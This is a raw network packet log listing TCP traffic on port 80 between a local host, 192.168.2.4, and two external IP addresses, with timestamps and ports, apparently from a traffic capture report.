Apr 26, 2024 23:09:02.293023109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.293837070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.293878078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.293917894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.293921947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.293956041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.293970108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.294003963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.294013023 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.294042110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.294076920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.294126987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.294558048 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.294938087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.294991970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.295006037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.295048952 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.295073986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.295115948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.295123100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.295136929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.295176983 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.295250893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.295264959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.295295954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.295304060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.296277046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.296291113 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.296303034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.296318054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.296327114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.296363115 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.296385050 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.296399117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.296423912 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.296449900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.296488047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.296593904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.297466040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.297480106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.297492027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.297517061 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.297533989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.297549963 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.297590971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.297626019 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.297650099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.297665119 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.297741890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.298465967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.298537016 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.298607111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.298610926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.298655033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.298669100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.298682928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.298696995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.298707962 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.298734903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.298736095 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.298779011 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.298784018 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.298816919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.298857927 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.300559044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.300573111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.300618887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.300632954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.300641060 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.300683975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.300688982 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.300765038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.300812960 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.300939083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.300954103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.300993919 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.301024914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.301105976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.301183939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.301224947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.301265955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.301307917 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.301315069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.301367998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.301424980 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.301462889 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.302345037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.302383900 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.302392006 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.302427053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.302443027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.302465916 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.302474976 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.302490950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.302508116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.302515030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.302555084 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.302588940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.302602053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.302633047 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.302637100 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.302680969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.302694082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.302721977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.303826094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.303869009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.303951025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.304025888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.304069996 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.304074049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.304152966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.304193020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.304197073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.304260969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.304302931 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.304327965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.305058956 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.305102110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.305107117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.305119991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.305147886 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.305967093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.305979967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.306013107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.306030035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.306066036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.306090117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.306107998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.306133032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.306147099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.306159019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.306176901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.306190968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.306775093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.306787014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.306798935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.306818008 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.307673931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.307714939 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.307715893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.307728052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.307770014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.307810068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.307822943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.307858944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.307879925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.307892084 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.307903051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.307914972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.307923079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.307926893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.307940960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.307957888 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.307971001 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.308022022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.308033943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.308044910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.308065891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.308073044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.308120012 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.308125973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.308137894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.308149099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.308176994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.308705091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.308743954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.308748007 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.308757067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.308769941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.308795929 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.308832884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.308845043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.308856964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.308868885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.308881998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.308901072 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.308906078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.308919907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.308931112 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.308945894 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.308973074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.308979988 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.308985949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.308999062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.309031010 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.309051991 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.309063911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.309084892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.309098005 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.309119940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.310067892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310102940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310112953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310123920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310137987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.310156107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310168028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310179949 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.310197115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310216904 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.310221910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310234070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310245037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310265064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.310292959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.310316086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310328960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310339928 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310374022 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.310393095 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310405970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310415983 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310435057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.310440063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310461998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.310491085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310503006 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310600996 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.310673952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310686111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310707092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310729980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.310750008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310755014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.310764074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310786963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310806990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.310827017 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310873985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.310893059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310905933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310928106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310940981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.310949087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.310961008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.311000109 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.311417103 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.311429024 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.311460972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.311496973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.311510086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.311522007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.311548948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.311564922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.311577082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.311580896 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.311620951 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.311644077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.311662912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.311675072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.311697960 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.311698914 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.311724901 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.311738014 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.311804056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.311849117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.311852932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.311867952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.311908960 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.311923027 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.312693119 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.312738895 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.312738895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.312808037 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.312820911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.312833071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.312844038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.312854052 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.312859058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.312869072 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.312885046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.312903881 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.312908888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.312933922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.312962055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.312971115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.312984943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.313009977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.313026905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.313070059 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.313095093 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.313108921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.313119888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.313146114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.313323021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.313361883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.313370943 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.313771009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.313786030 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.313827038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:02.313843966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.313859940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:02.326790094 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.326847076 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.326853991 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.326867104 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.326893091 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.326911926 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.326946974 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.327028036 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.327075958 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.327089071 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.327127934 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.327132940 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.327159882 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.327174902 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.327197075 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.327250004 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.327303886 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.327316999 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.327367067 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.327378988 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.327419996 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.327425003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.327457905 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.327465057 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.327503920 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.327526093 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.327575922 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.327588081 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.327631950 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.327644110 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.327686071 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.327697039 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.327742100 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.327753067 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.327800989 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.327869892 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.327919006 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.327981949 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.328031063 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:02.328053951 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:02.328104019 CEST	49733	80	192.168.2.4	185.172.128.76
